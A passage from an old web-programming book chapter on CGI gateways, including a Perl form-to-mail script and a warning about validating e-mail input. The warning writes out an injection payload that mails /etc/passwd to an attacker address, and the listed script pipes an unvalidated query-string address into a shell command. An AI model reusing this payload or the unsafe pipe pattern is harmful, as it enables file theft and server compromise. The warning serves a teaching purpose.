📄 ch7.htm
字号:
<TT><FONT FACE="Courier">if ($email =~ /[^a-zA-Z0-9_\-\.@]/) {
<BR>
</FONT></TT>
</BLOCKQUOTE>
<P>
<CENTER><TABLE BORDERCOLOR=#000000 BORDER=1 WIDTH=80%>
<TR><TD><B>Warning</B></TD></TR>
<TR><TD>
<BLOCKQUOTE>
Be very careful when you create a script that passes arguments to other programs or issues shell commands! If the input were not verified for illegal e-mail addresses, a cracker could easily exploit this hole. A cracker could, for example, send the file
containing the list of users' passwords on the server to his or her own mailbox, by introducing the e-mail <TT><FONT FACE="Courier">something ; mail bad@address.com < /etc/passwd</FONT></TT>! Or, even worse, the cracker could delete some files belonging
to the user that runs the Web server if he or she used the <TT><FONT FACE="Courier">rm</FONT></TT> (remove file) command instead of the <TT><FONT FACE="Courier">mail</FONT></TT> command! The golden rule is: Always verify user's input and allow only what is
strictly necessary.
</BLOCKQUOTE>
</TD></TR>
</TABLE></CENTER>
<P>
<H3><A NAME="FormbyMail">Form-by-Mail</A></H3>
<P>
The gateway presented in Listing 7.4 acts as an intermediary between
the Web server and a mail program. It is useful for sending form
results by e-mail. One of the uses for this, for example, is a
comments page in which users visiting your Web pages can leave
their comments or questions.
<P>
This script should be called from the form page with the <TT><FONT FACE="Courier">POST</FONT></TT>
method:
<BLOCKQUOTE>
<TT><FONT FACE="Courier"><FORM ACTION="/cgi-bin/mailform?user@server?subject"
METHOD=post></FONT></TT>
</BLOCKQUOTE>
<P>
The e-mail address where the form should be sent to is specified
in <TT><FONT FACE="Courier">user@server</FONT></TT>, and the subject
should go just after it. Both arguments are separated by a <TT><FONT FACE="Courier">?</FONT></TT>
sign. If the form has a field called <TT><FONT FACE="Courier">email</FONT></TT>,
the script will send the form results with the <TT><FONT FACE="Courier">From:</FONT></TT>
and <TT><FONT FACE="Courier">Reply-To:</FONT></TT> lines containing
the correct e-mail address, so you can use the reply function
of your mail reader program to answer the user's questions. If
there is no field called <TT><FONT FACE="Courier">email</FONT></TT>
on the form, the script will send the mail as if it came from
the user who runs the Web server (usually <TT><FONT FACE="Courier">nobody</FONT></TT>
or <TT><FONT FACE="Courier">webmaster</FONT></TT>). See Figure
7.5 for an example of an HTML form that uses the mailform script.
<P>
<A HREF="f7-5.gif" ><B>Figure 7.5:</B> <I>The HTML source of a form page.</I></A>
<HR>
<BLOCKQUOTE>
<B>Listing 7.4. A form-by-mail script called mailform.<BR>
</B>
</BLOCKQUOTE>
<BLOCKQUOTE>
<TT><FONT FACE="Courier">#!/usr/bin/perl<BR>
###########################################################################
<BR>
# mailform.pl 1.0 - A simple form-by-mail script #
<BR>
# &nb
sp;
#<BR>
# How does it
work?  
;
#<BR>
# It gets data from an HTML form and sends all the field values
to the #<BR>
# address specified as the first parameter of the script.
#<BR>
# &nb
sp;
#<BR>
# Special field on form named "email" is used for the
Reply-To header. #<BR>
# &nb
sp;
#<BR>
# Antonio
Ferreira &n
bsp; #
<BR>
#
amcf@esoterica.pt  
;
#<BR>
# &nb
sp;
#<BR>
# March
1996
#
<BR>
###########################################################################
<BR>
<BR>
require '/usr/lib/cgi-lib.pl'; #
The useful cgi-lib<BR>
<BR>
######################### Variable initialization ########################
<BR>
<BR>
##### Paths, binaries and system specific information #####<BR>
$url = 'http://www.esoterica.pt/cgi-bin/mailform.pl'; #
mailform URL<BR>
$sendmail = '/usr/bin/smail'; #
Path and parameters for the mailer<BR>
$mailserver = 'mail.esoterica.pt'; #
Complete mail server hostname<BR>
<BR>
########################## Start of Main Program ##########################
<BR>
<BR>
&ReadParse(*input); #
cgi-lib, constructs list of key=value form data<BR>
print &PrintHeader(); #
cgi-lib, prints header "Content-type: text/html\n\n"
<BR>
<BR>
($destaddr, $subject, $garbage) = split(/\?/i, $ENV{'QUERY_STRING'});
<BR>
if (&MethGet()) {<BR>
print <<EOM;<BR>
<HTML><BR>
<HEAD><BR>
<TITLE>Message not sent</TITLE><BR>
</HEAD><BR>
<BODY><BR>
The message should be sent with the <B>POST</B> method!
<BR>
</BODY><BR>
</HTML><BR>
EOM<BR>
} else {<BR>
if ($destaddr eq '') {<BR>
print <<EOM;
<BR>
<HTML><BR>
<HEAD><BR>
<TITLE>Message not sent</TITLE><BR>
</HEAD><BR>
<BODY><BR>
The message did not have a destination address.<BR>
</BODY><BR>
</HTML><BR>
EOM<BR>
} else {<BR>
&SendForm();
<BR>
}<BR>
}<BR>
<BR>
exit(0);<BR>
<BR>
########################## End of Main Program ##########################
<BR>
<BR>
#################### Start of subroutines definitions ###################
<BR>
<BR>
##### Uses the mailer defined to send the reply #####<BR>
sub SendForm {<BR>
$fromurl = $ENV{'HTTP_REFERER'};<BR>
$fromhost = $ENV{'REMOTE_HOST'};<BR>
if ($subject eq '') {<BR>
$subject = $fromurl;
<BR>
}<BR>
if ($input{'email'} eq '') {<BR>
$fromaddr = 'www';
<BR>
} else {<BR>
$fromaddr = $input{'email'};
<BR>
}<BR>
open(MAIL,"| $sendmail \"$destaddr\"");
<BR>
print MAIL <<EOM;<BR>
From: $fromaddr<BR>
To: $destaddr<BR>
Reply-To: $fromaddr<BR>
Subject: $subject<BR>
X-Mail-Program: Mailform<BR>
<BR>
URL: $fromurl<BR>
SERVIDOR: $fromhost<BR>
<BR>
EOM<BR>
foreach $field (@input) {<BR>
$_ = $field;<BR>
($name) = /^(.+)\=.*$/;
<BR>
print MAIL "-=-=-
$name -=-=-\n";<BR>
print MAIL "$input{$name}\n";
<BR>
}<BR>
close(MAIL);
<BR>
print
<<EOM;<BR>
<HTML><BR>
<HEAD><BR>
<TITLE>Message sent</TITLE><BR>
</HEAD><BR>
<BODY><BR>
<H2 ALIGN=center>Your message was sent to $destaddr!</H2>
<BR>
</BODY><BR>
</HTML><BR>
EOM<BR>
}</FONT></TT>
</BLOCKQUOTE>
<HR>
<P>
The HTML source presented in Figure 7.5 corresponds to the FORM
in Figure 7.6. This figure shows what the user sees in his or
her browser.
<P>
<A HREF="f7-6.gif" ><B>Figure 7.6:</B> <I>The form that will be sent by mail.</I></A>
<P>
When the user presses the button Send It, the form will be sent
by mail and will arrive to its destination mailbox. The received
mail message will be similar to the one presented in Figure 7.7.
<P>
<A HREF="f7-7.gif" ><B>Figure 7.7:</B> <I>The message that arrived in the mailbox.</I></A><I>.</I>
<P>
Lots of other examples could be given here, but we'll let you
explore further. There are many gateways out there waiting for
you to improve them: finger, wais, archie, uptime, passwd, mail,
news, and so on. Explore the programs or protocols first and then
modify the corresponding gateways to suit your needs.
<H2><A NAME="UsingtheWebasaStandardInternetAcc"><FONT SIZE=5 COLOR=#FF0000>Using
the Web as a Standard Internet Access Interface</FONT></A></H2>
<P>
When I first became familiar with the Web and then with CGI and
gateways, I started thinking to myself: "Wow, the Web is
great, and I'll use it to do everything I have ever dreamed of
doing on the Internet!" Yes and No. The Web is really great,
and it is actually the most suited platform to integrate most
of Internet services or functions. But there are some protocols
that simply cannot be integrated in Web pages through the use
of gateways or similar mechanisms due to their original design,
which is incompatible with the Web.
<P>
One such example is the telnet protocol. This protocol is highly
interactive and does not fit within the client/server connect-and-send-on-demand
architecture of the HTTP protocol and the Web. During a telnet
connection, the user screen and the telnet server must be connected
without interruption so the user can type characters on the keyboard
and immediately see results on the screen. How could that be done
in a Web page? We could imagine a Web page that would be reloaded
each time the user presses a key or each time there are results
coming from the telnet server, but that would be practically impossible
to accomplish due to performance considerations and design difficulties
on the server side. What is possible is the integration of a telnet
capable program within a Web browser so that we can telnet from
a Web page. But that would be more a telnet screen than a Web
page.
<P>
Another example is the Ping protocol. This is used to test if
a machine is alive and well. The client sends packets of bits,
and the server replies as soon as it receives these packets. Generally,
Ping programs send and receive packets until we stop them deliberately,
which causes a problem because a result HTML page can be produced
only when program activity (in this case, Ping activity) finishes
with no user intervention. So, one must use a Ping program that
sends and receives a fixed number of packets and, as soon as it
finishes, sends results back to be displayed in an HTML page.
<P>
Fortunately, many other protocols can be integrated through the
use of a gateway. For example, there are mail and news gateways
that allow reading of mail and news, respectively, as well as
database gateways that allow querying from a Web page.
<P>
The World Wide Web is evolving as the most powerful, cross-platform,
independent, distributed, and hypermedia mechanism for information
retrieval. Gateways can only help the Web expand even more in
order to become <I>the</I> platform for Internet access. Stay
tuned!
<H2><A NAME="Summary"><FONT SIZE=5 COLOR=#FF0000>Summary</FONT></A>
</H2>
<P>
This chapter covered server-side includes and World-Wide Web gateways.
Both mechanisms help you extend your Web server functionality
and consequently improve the richness of the information you want
to show to other users. You have learned how to use both SSI and
gateways and how to develop custom solutions for your own use.
<P>
<HR WIDTH="100%"></P>
<CENTER><P><A HREF="ch6.htm"><IMG SRC="pc.gif" BORDER=0 HEIGHT=88 WIDTH=140></A><A HREF="#CONTENTS"><IMG SRC="cc.gif" BORDER=0 HEIGHT=88 WIDTH=140></A><A HREF="index.htm"><IMG SRC="hb.gif" BORDER=0 HEIGHT=88 WIDTH=140></A><A HREF="ch8.htm"><IMG
SRC="nc.gif" BORDER=0 HEIGHT=88 WIDTH=140></A></P></CENTER>
<P>
<HR WIDTH="100%"></P>
</BODY>
</HTML>⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -